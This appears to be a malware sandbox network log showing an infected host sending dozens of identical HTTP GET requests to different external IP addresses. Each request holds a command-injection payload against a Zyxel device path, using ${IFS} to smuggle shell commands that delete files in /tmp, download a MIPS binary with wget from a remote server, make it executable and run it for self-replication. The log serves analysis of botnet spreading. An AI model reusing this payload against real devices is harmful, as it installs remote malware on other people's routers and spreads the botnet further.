                                      Jan 19, 2024 17:29:33.791522980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4611192.168.2.144593061.181.46.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791558027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4612192.168.2.143839642.247.97.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791603088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4613192.168.2.145200482.27.89.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791627884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4614192.168.2.1455182172.101.64.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791660070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4615192.168.2.14488141.97.35.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791726112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4616192.168.2.143900667.197.117.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791735888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4617192.168.2.1435402101.153.192.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791763067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4618192.168.2.143782087.102.227.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791794062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4619192.168.2.1435588132.45.141.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791846037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4620192.168.2.144656248.190.86.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791888952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4621192.168.2.1457610146.160.190.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791919947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4622192.168.2.143382284.120.35.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791959047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4623192.168.2.1450024199.145.51.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792000055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4624192.168.2.1447448137.187.205.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792036057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4625192.168.2.144235277.56.157.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792062998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4626192.168.2.1453612164.182.108.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792094946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4627192.168.2.144687840.107.134.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792140007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4628192.168.2.1441458130.212.236.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792161942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4629192.168.2.1451518199.225.102.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792218924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4630192.168.2.145453238.47.152.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792285919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4631192.168.2.1447256207.173.8.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792309046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4632192.168.2.1459618184.148.252.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792356014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4633192.168.2.1460010160.1.152.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792402029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4634192.168.2.145908817.197.216.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792447090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4635192.168.2.1459944190.67.187.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792469025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4636192.168.2.1441904181.199.221.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792527914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4637192.168.2.1456194172.175.247.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792555094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4638192.168.2.143366286.182.32.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792617083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4639192.168.2.1440004142.104.158.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792639971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4640192.168.2.1436012138.195.238.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792675018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4641192.168.2.1439896117.38.94.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792700052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4642192.168.2.1439300163.48.13.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792824984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4643192.168.2.1458222171.14.191.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792853117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4644192.168.2.1443216119.219.200.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792916059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4645192.168.2.1447548128.136.125.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792943954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4646192.168.2.146008436.128.196.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.792995930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4647192.168.2.14421641.253.177.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793045044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4648192.168.2.1460806151.131.145.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793082952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4649192.168.2.145574024.239.14.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793142080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4650192.168.2.1439954202.136.76.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793179035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4651192.168.2.145826046.187.46.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793214083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4652192.168.2.1438524131.179.72.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793245077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4653192.168.2.1434342210.28.145.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793286085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4654192.168.2.1457406114.252.83.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793343067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4655192.168.2.144678880.109.191.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793381929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4656192.168.2.145255473.145.125.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793421030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4657192.168.2.145292073.190.150.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793442965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4658192.168.2.1447110222.45.233.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793494940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4659192.168.2.1444238112.107.124.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793525934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4660192.168.2.145549059.191.186.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793569088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4661192.168.2.144659036.51.182.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793596983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4662192.168.2.1453466153.40.23.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793661118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4663192.168.2.1440190111.83.218.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793695927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4664192.168.2.1432788139.243.123.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793751955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4665192.168.2.1438084204.191.78.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793781042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4666192.168.2.1460556120.185.176.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793828964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4667192.168.2.1443764158.208.176.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793863058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4668192.168.2.1446992119.53.152.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793895960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4669192.168.2.1441856149.29.102.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793909073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4670192.168.2.1458922103.244.83.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793953896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4671192.168.2.1441772166.112.10.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.793997049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4672192.168.2.1441530208.203.121.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794049025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4673192.168.2.1454766202.70.1.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794087887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4674192.168.2.1445278115.104.91.13443
                                      TimestampBytes transferredDirectionData
